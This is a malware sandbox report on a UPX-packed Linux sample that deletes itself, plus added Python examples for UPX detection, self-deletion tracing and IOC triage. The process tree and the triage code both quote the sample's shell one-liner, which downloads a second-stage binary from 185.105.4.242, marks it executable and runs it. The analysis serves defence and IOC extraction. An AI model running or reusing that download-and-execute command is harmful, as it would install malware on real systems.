Malware Analysis Report

2025-08-06 00:00

Sample ID 240506-3qzjbsgg3z
Target 1eba58349097d69448baf6e53a7f7e15_JaffaCakes118
SHA256 9705f86089dcbedf355de1b957fc4836a98d707090c2116793fc7fe2bf1db189
Tags
upx
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

9705f86089dcbedf355de1b957fc4836a98d707090c2116793fc7fe2bf1db189

Threat Level: Shows suspicious behavior

The file 1eba58349097d69448baf6e53a7f7e15_JaffaCakes118 shows suspicious behavior (score 7/10): it is UPX packed, deletes itself after launch, and runs a shell one-liner that fetches a second-stage binary (n1) from 185.105.4.242 over HTTP, marks it executable and runs it (see the behavioral1 process tree). The report carries no analysis of the downloaded n1 itself; the only artifact recorded under Files is a memory dump of the first stage.

Malicious Activity Summary

upx

UPX packed file

Deletes itself

Reads runtime system information

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-05-06 23:43

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
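The "UPX packed file" signature above is the sandbox's own static match. The following added example, which is not the sandbox's check and not code from the report, shows what a practitioner can verify independently on the raw file: the `UPX!` loader magic, the `$Info:` packer string, and the absence of a section-header table (stock UPX output for ELF has none). The two sample blobs are constructed in the code and are not the reported binary.

```python
"""Static UPX indicators for an ELF image: loader magic, packer info string and
the missing section-header table.  Added example, not the sandbox's own check."""
import struct

ELF_MAGIC = b"\x7fELF"
UPX_MAGIC = b"UPX!"   # l_magic of the UPX loader header, also in the trailing pack header
UPX_INFO = b"$Info: This file is packed with the UPX executable packer"


def upx_indicators(data: bytes) -> dict:
    """Return static UPX indicators for the raw bytes of a file."""
    res = {
        "is_elf": data.startswith(ELF_MAGIC),
        "elf_class": None,
        "section_header_count": None,
        "upx_magic_offsets": [],
        "has_upx_info_string": UPX_INFO in data,
    }
    if res["is_elf"] and len(data) >= 6:
        res["elf_class"] = 32 if data[4] == 1 else 64
        endian = "<" if data[5] == 1 else ">"
        # e_shnum lives at 0x30 in the ELF32 header and at 0x3C in ELF64
        shnum_off = 0x30 if res["elf_class"] == 32 else 0x3C
        if len(data) >= shnum_off + 2:
            res["section_header_count"] = struct.unpack_from(endian + "H", data, shnum_off)[0]
    off = data.find(UPX_MAGIC)
    while off != -1:
        res["upx_magic_offsets"].append(off)
        off = data.find(UPX_MAGIC, off + 1)
    if res["upx_magic_offsets"] or res["has_upx_info_string"]:
        res["verdict"] = "upx"                 # stock UPX: 'upx -d' should restore it
    elif res["is_elf"] and res["section_header_count"] == 0:
        # UPX output carries no section headers, but so does any sstrip'ed
        # binary and a UPX file whose markers were scrubbed; dump from memory
        res["verdict"] = "packed-or-stripped"
    else:
        res["verdict"] = "no-upx-indicator"
    return res


def make_elf32_header(e_shnum: int) -> bytes:
    """Constructed 52-byte little-endian ELF32 header for the demo below."""
    ident = ELF_MAGIC + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS32, LE, EV_CURRENT, SysV
    return ident + struct.pack(
        "<HHIIIIIHHHHHH",
        2, 3,                       # e_type ET_EXEC, e_machine EM_386
        1, 0x08048000, 52, 0, 0,    # e_version, e_entry, e_phoff, e_shoff, e_flags
        52, 32, 1, 40, e_shnum, 0,  # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    )


# Constructed samples, not the report's binary: a UPX-style image (loader
# magic, info string, no section headers) and a plain binary with 30 sections.
PACKED_SAMPLE = (make_elf32_header(0) + b"\x00" * 12 + UPX_MAGIC + b"\x0d\x16"
                 + b"\x00" * 20 + UPX_INFO + b" http://upx.sf.net $\x00")
PLAIN_SAMPLE = make_elf32_header(30) + b"\x00" * 64

if __name__ == "__main__":
    for name, blob in (("packed", PACKED_SAMPLE), ("plain", PLAIN_SAMPLE)):
        r = upx_indicators(blob)
        print(f"{name}: {r['verdict']} (UPX! at {r['upx_magic_offsets']}, sections={r['section_header_count']})")
```

A "upx" verdict means `upx -d` is worth trying first; a "packed-or-stripped" verdict on a sample that still behaves like packed code usually means the loader markers were scrubbed, in which case the unpacked image has to be taken from a running process, which is what the memory dump listed under Files in this report provides.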

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-06 23:43

Reported

2024-05-06 23:46

Platform

ubuntu1804-amd64-20240226-en

Max time kernel

139s

Max time network

151s

Command Line

[/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118]

Signatures

Deletes itself

Description              Indicator        Process                                              Target
N/A                      N/A              /tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118  N/A

Reads runtime system information

Description              Indicator        Process                                              Target
File opened for reading  /proc/self/exe   /tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118  N/A
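The two signatures above describe a process that opens /proc/self/exe and then removes its own file from disk. The sandbox does not show the syscalls behind them, so the following added example (not the sandbox's detection logic) reconstructs the check over a constructed `strace -f` style trace: it remembers the path each pid was started from via execve, flags reads of /proc/self/exe, and flags an unlink of that same path. The pids and syscall sequence are invented for the demo; only the sample path is taken from the report.

```python
"""Flag a process that reads and then unlinks its own executable, the pattern
behind the 'Deletes itself' and '/proc/self/exe' signatures.  Added example run
over a constructed strace -f style trace; not the sandbox's detection logic."""
import re

LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<call>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\d+|\?)")
STR_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')   # first quoted argument is the path
SELF_IMAGE = "/proc/self/exe"


def find_self_deletion(trace_lines):
    """Return findings per pid: reads of its own image and unlinks of its execve path."""
    exe_of = {}     # pid -> path given to a successful execve
    findings = []
    for line in trace_lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        pid, call, ret = m["pid"], m["call"], m["ret"]
        strings = STR_RE.findall(m["args"])
        path = strings[0] if strings else None
        if call == "execve" and ret == "0" and path:
            exe_of[pid] = path
        elif call in ("open", "openat", "readlink", "readlinkat") and path == SELF_IMAGE:
            findings.append({"pid": pid, "kind": "reads-own-image", "path": path})
        elif call in ("unlink", "unlinkat") and ret == "0" and path and path == exe_of.get(pid):
            findings.append({"pid": pid, "kind": "deletes-self", "path": path})
    return findings


SAMPLE = "/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118"   # path from the report
# Constructed trace: pids and the syscall sequence are invented for the demo
TRACE = [
    '1575 execve("%s", ["%s"], 0x7ffd2c0c2e80 /* 18 vars */) = 0' % (SAMPLE, SAMPLE),
    '1575 openat(AT_FDCWD, "/proc/self/exe", O_RDONLY) = 3',
    '1575 read(3, "\\177ELF\\1\\1\\1\\0"..., 52) = 52',
    '1575 unlink("%s") = 0' % SAMPLE,
    '1575 clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|SIGCHLD) = 1580',
    '1580 execve("/bin/sh", ["sh", "-c", "wget http://185.105.4.242/wrgjwrgjwrg246356356356/n1; '
    'chmod 777 *; ./n1 wget.echo.telnet.x86"], 0x7ffd2c0c2e80 /* 18 vars */) = 0',
    '1580 unlinkat(AT_FDCWD, "/tmp/scratch.txt", 0) = 0',   # unrelated delete: not flagged
]

if __name__ == "__main__":
    for finding in find_self_deletion(TRACE):
        print(finding)
```

Two caveats for real traces: a bot that unlinks a relative argv[0] after a chdir, or from a forked child, needs cwd tracking and clone/fork lineage before the path comparison holds; and deletion from disk does not remove the image from the running process, so `cp /proc/<pid>/exe` while the pid is alive recovers the file the signature says was deleted.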

Processes

/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118

[/tmp/1eba58349097d69448baf6e53a7f7e15_JaffaCakes118]

/bin/sh

[sh -c wget http://185.105.4.242/wrgjwrgjwrg246356356356/n1; chmod 777 *; ./n1 wget.echo.telnet.x86]

/usr/bin/wget

[wget http://185.105.4.242/wrgjwrgjwrg246356356356/n1]

Network

Country  Destination          Domain                     Proto
N/A      224.0.0.251:5353     -                          udp
US       151.101.130.49:443   -                          tcp
US       1.1.1.1:53           cdn.fwupd.org              udp
US       1.1.1.1:53           cdn.fwupd.org              udp
US       151.101.194.49:443   cdn.fwupd.org              tcp
US       151.101.1.91:443     -                          tcp
GB       89.187.167.5:443     -                          tcp
GB       185.125.188.61:443   -                          tcp
GB       185.125.188.61:443   -                          tcp
US       151.101.1.91:443     -                          tcp
US       1.1.1.1:53           1527653184.rsc.cdn77.org   udp
US       1.1.1.1:53           1527653184.rsc.cdn77.org   udp
GB       195.181.164.21:443   1527653184.rsc.cdn77.org   tcp
RO       185.105.4.242:80     -                          tcp
RO       185.105.4.242:80     -                          tcp

Each row is one connection; repeated rows are repeated connections. Only the two 185.105.4.242:80 connections match a process in the tree (the wget launched from /bin/sh); the report attributes none of the other destinations to a sample process, so they should be treated as background traffic of the sandbox image unless correlated with a process.
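The process tree and the network table together are the actionable part of this report: the `sh -c` one-liner is a textbook download-and-execute chain, and only one host in the table is explained by it. The following added example, which is not code from the report or from the sandbox, parses that command line into its fetch, chmod and execute stages, extracts the URL and host as IOCs, and uses them to split the network rows (copied from the table above, deduplicated) into attributed and unattributed. The fetcher list and the split on `;`, `&&` and `|` are assumptions of the example.

```python
"""Triage of the behavioral1 process chain: pull the download-and-execute IOCs
from the sh -c command line and keep only the network rows they explain.
Added example; command line and network rows are copied from the report."""
import os
import re
from urllib.parse import urlparse

CMDLINE = ("sh -c wget http://185.105.4.242/wrgjwrgjwrg246356356356/n1; "
           "chmod 777 *; ./n1 wget.echo.telnet.x86")

URL_RE = re.compile(r"""https?://[^\s;"']+""")
FETCHERS = {"wget", "curl", "tftp", "ftpget"}   # assumed set of downloader commands


def triage_downloader(cmdline: str) -> dict:
    """Split a shell one-liner into stages and classify fetch / chmod / execute steps."""
    m = re.match(r"^\s*(?:/bin/)?sh\s+-c\s+(.*)$", cmdline)
    body = m.group(1) if m else cmdline
    stages = [s.strip() for s in re.split(r";|&&|\|\||\|", body) if s.strip()]
    urls, chmods, executes = [], [], []
    for stage in stages:
        argv = stage.split()
        if argv[0] in FETCHERS:
            urls.extend(URL_RE.findall(stage))
        elif argv[0] == "chmod":
            chmods.append(" ".join(argv[1:]))        # '777 *': every file in cwd, world-writable
        elif argv[0].startswith(("./", "/")):
            executes.append({"binary": argv[0], "args": argv[1:]})
    fetched = {os.path.basename(urlparse(u).path) for u in urls}
    runs_fetched = any(os.path.basename(e["binary"]) in fetched for e in executes)
    return {
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "chmods": chmods,
        "executes": executes,
        "verdict": "download-and-execute" if urls and runs_fetched else "inconclusive",
    }


# Network rows from the report (country, destination, domain, proto), deduplicated
NETWORK = [
    ("N/A", "224.0.0.251:5353", "", "udp"),
    ("US", "151.101.130.49:443", "", "tcp"),
    ("US", "1.1.1.1:53", "cdn.fwupd.org", "udp"),
    ("US", "151.101.194.49:443", "cdn.fwupd.org", "tcp"),
    ("US", "151.101.1.91:443", "", "tcp"),
    ("GB", "89.187.167.5:443", "", "tcp"),
    ("GB", "185.125.188.61:443", "", "tcp"),
    ("US", "1.1.1.1:53", "1527653184.rsc.cdn77.org", "udp"),
    ("GB", "195.181.164.21:443", "1527653184.rsc.cdn77.org", "tcp"),
    ("RO", "185.105.4.242:80", "", "tcp"),
]


def attribute_network(rows, hosts):
    """Split rows into those explained by a host the process tree contacted and the rest."""
    attributed, unattributed = [], []
    for row in rows:
        ip = row[1].rsplit(":", 1)[0]
        (attributed if ip in hosts or row[2] in hosts else unattributed).append(row)
    return attributed, unattributed


if __name__ == "__main__":
    t = triage_downloader(CMDLINE)
    a, u = attribute_network(NETWORK, t["hosts"])
    print(t["verdict"], t["urls"], t["executes"])
    print("attributed:", a)
    print("unattributed (sandbox OS noise until proven otherwise):", len(u))
```

The argv[1] token `wget.echo.telnet.x86` is handed to the downloaded binary unchanged; it is consistent with the vector.arch tags that Mirai-derived loaders pass, but nothing in this report identifies the family, so the verdict here stays at "download-and-execute" and the IOCs are the URL, the host 185.105.4.242 and the dropped file name n1.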

Files

memory/1575-1-0x0000000008048000-0x000000000804d608-memory.dmp